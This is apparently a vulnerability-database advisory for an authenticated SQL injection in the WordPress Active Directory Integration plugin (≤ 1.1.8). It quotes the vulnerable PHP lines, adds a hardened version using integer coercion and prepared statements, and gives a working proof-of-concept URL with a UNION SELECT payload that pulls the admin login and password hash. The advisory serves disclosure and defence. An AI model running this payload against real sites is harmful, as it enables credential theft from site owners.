Active Directory Integration <= 1.1.8 - Authenticated SQL Injection

Description
Required access: administrator user.
The target must have LDAP configured and active.

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line: 135
$result = $ADI->bulksyncback( $_GET['userid'] );


$_GET['userid'] is not escaped.


Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142
$wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");
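The following is an added example, not the plugin's own code: it places the unsafe pattern from the two lines above beside a hardened version that validates the id as an integer and binds it through $wpdb->prepare(). Function names, the nonce action name and the capability used are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code). Function and parameter names,
// the capability check and the nonce action name are assumptions.

// BEFORE (the pattern the advisory describes): the raw query-string value
// is interpolated into the SQL text, so anything after the digits is sent
// to MySQL unchanged.
function adi_bulksyncback_vulnerable( $wpdb, $userid ) {
    return $wpdb->get_results(
        "SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' "
        . "AND meta_value <> '' AND user_id <> 1 AND user_id = $userid"
    );
}

// AFTER: coerce the input to a non-negative integer and bind it with a %d
// placeholder. absint() turns any non-numeric tail into nothing, so the
// value that reaches the query is only ever an integer literal.
function adi_bulksyncback_hardened( $wpdb, $raw_userid ) {
    $userid = absint( $raw_userid );
    if ( 0 === $userid ) {
        return array(); // reject empty, non-numeric or out-of-range ids
    }
    $sql = $wpdb->prepare(
        "SELECT user_id FROM {$wpdb->usermeta} "
        . "WHERE meta_key = %s AND meta_value <> '' AND user_id <> 1 AND user_id = %d",
        'adi_samaccountname',
        $userid
    );
    return $wpdb->get_results( $sql );
}

// Caller side (the syncback.php equivalent): keep the administrator
// requirement the advisory notes, add a nonce so the endpoint cannot be
// driven by a crafted link, and hand over only the validated id.
function adi_handle_syncback_request( $wpdb ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'adi_syncback' ); // assumed nonce action name
    $userid = isset( $_GET['userid'] ) ? absint( $_GET['userid'] ) : 0;
    return adi_bulksyncback_hardened( $wpdb, $userid );
}
```

Even with prepare() in place, the integer coercion is worth keeping: it gives a single point where an invalid id is rejected and logged, which is also the simplest detection hook for requests carrying non-numeric userid values against this endpoint.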

Proof of Concept
target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/09/11/english-active-directory-integration-wordpress-plugin-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 5657
Verified No
WPVDB ID 8952

Timeline

Publicly Published 2017-11-03 (about 2 years ago)
Added 2017-11-12 (about 2 years ago)
Last Updated 2019-11-01 (about 2 months ago)